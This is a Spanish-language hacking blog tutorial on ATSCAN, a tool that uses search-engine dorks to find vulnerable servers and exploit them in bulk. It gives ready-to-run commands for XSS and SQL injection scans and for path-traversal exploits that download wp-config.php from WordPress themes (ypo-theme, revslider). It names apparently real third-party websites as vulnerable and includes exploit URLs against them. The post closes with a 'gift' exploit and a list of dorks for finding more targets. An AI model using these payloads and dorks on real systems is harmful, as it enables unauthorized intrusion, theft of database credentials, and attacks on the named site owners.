HACKER ANGELWHITE GALC

miércoles, 23 de noviembre de 2016

ATSCAN - Advanced Search / Dork / Mass Exploitation Scanner






 



ATSCAN, es un framework automatizado, que nos permite encontrar servidores vulnerables por medio de avanzadas metodologías de escaneo, por otra parte nos permite a su vez testear si el servidor es vulnerable o no.

Sin duda una herramienta que nos puede ahorrar mucho tiempo en nuestras auditorias cuando no dispongamos de un tiempo prolongado, deben tener en cuenta que la búsqueda se define por los "Motores" como:

Google / Bing / Ask / Yandex / Sogou

Ya explicado como funciona la herramienta, pueden ver las funciones que tiene ATSCAN.


Descripción:

Motor de búsqueda Google / Bing / Ask / Yandex / Sogou
Mass Dork Busqueda
Múltiples escaneos instantáneos.
Explotación masiva
Usa proxy.vulnerables mediante "DORKS"
Agente de usuario aleatorio.
Motor aleatorio.
Extern comandos de ejecución.
Escáner XSS / SQLI / LFI / AFD.
Filtre los sitios wordpress y Joomla en el servidor.
Buscar la página de administración.
Decodificar y codificar Base64 / MD5
Escaneado de puertos.
Extraer IPs
Extraiga correos electrónicos.
Detección automática de errores.
Detección automática de Cms.
Datos de correos.
Repetidor de secuencia automática.
Validación.
Publicar y obtener el método GET



Descarga:

root@kali:~# https://github.com/AlisamTechnology/ATSCAN.git

luego de descarga el paquete de ATSCAN, procederemos a entrar a su carpeta respectiva y establecer permisos al archivo principal.

root@kali:~# cd ATSCAN
root@kali:~/ATSCAN# chmod +x ./atscan.pl


posteriormente pasaremos a darle permisos al archivo de instalación y ejecutarlo.

root@kali:~#  chmod +x ./install.sh
root@kali:~#  ./install.sh 


luego de instalar todos las depencias que necesita ASTCAN, pueden ejecutarlo de la siguiente manera para probar, si no tienen ningun error, de la siguiente manera:

root@kali:~# atscan


Como vemos la herramienta nos carga correctamente, si ustedes añaden la opción: atscan --help podrán ver las formas de uso que pueden utilizar.


como pueden ver, en la imagen no nos muestra las demás opciones porque son demasiadas, pero ustedes podrán verlo en su terminal, o simplemente pueden visitar la pagina Github donde se encuentra la herramienta:

https://github.com/AlisamTechnology/ATSCAN


NO quiero ser despreciativo con mis palabras, pero eh visto muchos tutoriales hace meses y hasta ahora que ejecutan el siguiente argumento para elaborar sus tutoriales:

atscan --dork "eventos.php" --level 10 --xss

 voy a explicar esta metodología es ordinaria:

--dork = en ese parametro añadiremos la dork que deseamos realizar la busqueda.

--level = la cantidad de niveles de escaneo que queremos que se realice.

--xss = especificamos buscar solo fallas "CROSS-SITE-SCRIPTING"


 ---------------------------------------------------------------------------------------------------------------------------------
 [::] TEAM:: ALISAM TECHNOLOGY
 [::] TOOL:: ATSCAN SCANNER [V 11.0]
 [::] PATH:: /ATSCAN/atscan.pl
 [::] PERL:: [v5.24.1]
 [::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
 [::] PROXY:: [No Proxy]
 [::] SCAN:: [XSS]
 [::] ENGINE:: [DEFAULT BING bn-IN]
 [::] DORK:: [eventos.php?]
 [::] LEVEL:: [10]
------------------------------------------------------------------------------------------------------------------------------------


Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":


root@kali:~# atscan --dork "noticias.php?" --xss --level 10 -m 2

---------------------------------------------------------------------------------------------------------------------------------
 [::] TEAM:: ALISAM TECHNOLOGY
 [::] TOOL:: ATSCAN SCANNER [V 11.0]
 [::] PATH:: /ATSCAN/atscan.pl
 [::] PERL:: [v5.24.1]
 [::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
 [::] PROXY:: [No Proxy]
 [::] SCAN:: [XSS]
 [::] ENGINE:: [GOOGLE dz]
 [::] DORK:: [noticias.php?]
 [::] LEVEL:: [10]
-----------------------------------------------------------------------------------------------------------------------------------


-m = 2  >> Google

la diferencia de google, es que por mas que te conectes a un servidor de otro país, la palabra buscada siempre sera "indexeada" y tu servidor reconocido por ende los resultados serán orgánicos.
  
estas son las opciones que puedes utilizar para escoger a tu indexeador.

[Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]

Continuando con el escaneo podemos observar que hemos encontrado un servidor vulnerable, en el primer escenario tenemos una vulnerabilidad "MYSQL" expuesto a una explotación SQL INJECTION, se preguntaran el porque, es porque hemos utilizado una dork con el ultimo termino "?" acompañado de nuestra búsqueda personalizada.

http://www.izquierdo-asociados.com/noticias.php?id=39%270x27

Testando la vulnerabilidad mediante SQLMAP:








bastante útil verdad, una búsqueda aleatoria, ahora probemos encontrando un servidores en wordpress vulnerables.

Utilizaremos el exploit que afecta un tema de wordpress conocido como /ypo-theme/

##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################

 Añadiremos a la terminal:

atscan --dork "inurl:/wp-content/themes/ypo-theme/" --level 100 -m 2 --exp "/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php" --wp --wpafd

inurl:/wp-content/themes/ypo-theme/ >> Búsqueda de directorios del tema
--level >> la cantidad de niveles de escaneo que queremos que se realice.
--exp  >> Exploit en nuestro caso: 

/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php


---------------------------------------------------------------------------------------------------------------------------------
 [::] TEAM:: ALISAM TECHNOLOGY
 [::] TOOL:: ATSCAN SCANNER [V 11.0]
 [::] PATH:: /ATSCAN/atscan.pl
 [::] PERL:: [v5.24.1]
 [::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
 [::] PROXY:: [No Proxy]
 [::] EXPLOIT:: [1 Exploit(s)]
 [::] SCAN:: [AFD]
 [::] GET:: [WP sites]
 [::] ENGINE:: [GOOGLE bs]
 [::] DORK:: [inurl:/wp-content/themes/ypo-theme/]
 [::] LEVEL:: [100]
-------------------------------------------------------------------------------------------------------------------------------
 

el resultado fue impresionante, entraremos a un link para comprobar si tenemos el documento sensible WP.

Ejemplo deben añadir el exploit de esta manera en su navegador:

http://www.gynesurgery.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php 


si te confundes en este procedimiento puedes visitar el siguiente articulo   con la misma metodología de explotación:

http://www.backtrack-omar.com/2014/04/explotando-vulnerabilidades-de-wordpress.html 


continuamos, una ves descargado el archivo vamos abrirlo:

Su uso es fácil, si sabes comprender algunos argumentos necesarios.
si desean explotar otros "0days", pueden ingresar al siguiente enlace:

https://www.exploit-db.com/

Un regalo de mi parte:


atscan --dork ""Index of" +/wp-content/themes/IncredibleWP/" --level 100 -m 2 --exp "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" --wp --wpafd


"Index of" +/wp-content/themes/IncredibleWP/"
"Index of" +/wp-content/themes/ultimatum"
"Index of" +/wp-content/themes/medicate/"
"Index of" +/wp-content/themes/Avada/"
"Index of" +/wp-content/themes/beach_apollo/"

Exploit: "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"


Happy Hacking!

un consejo personal

Como sabemos Google es un servicio de indexación  de paginas web's, entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva, el procedimiento de google, es una búsqueda respectiva de la palabra "noticias.php?id=" que recopila el código fuente de información de todas las plataformas web que contengan la palabra "noticias.php?id=" y obtener el resultado de las mismas.

Hace mucho tiempo elabore algunos POST relacionado a la auditoria de plataformas web de forma manual, por medio de distintos métodos para encontrar vulnerabilidades que un Escaner no pueden encontrar, si deseas aprender esta metodología puedes visitar el siguiente articulo:

http://www.backtrack-omar.com/2015/11/como-debo-empezar-para-auditar-un.html

Si deseas aprender como utilizar las dorks de google manualmente, los invito a leer el siguiente articulo:

http://www.backtrack-omar.com/2015/09/method-ninja-of-google-hacking.html

Hoy en día, se están creando muchos "Frameworks" y herramientas que nos permiten optimizar todo este proceso, pero con solo un 70 % de posibilidades positivas, ya que una herramienta solamente sigue patrones establecidos, y auditar de forma manual, lleva todas tus capacidades de experiencia al limite para poder encontrar un agujero de seguridad hasta en la sopa.

No hay comentarios:

Publicar un comentario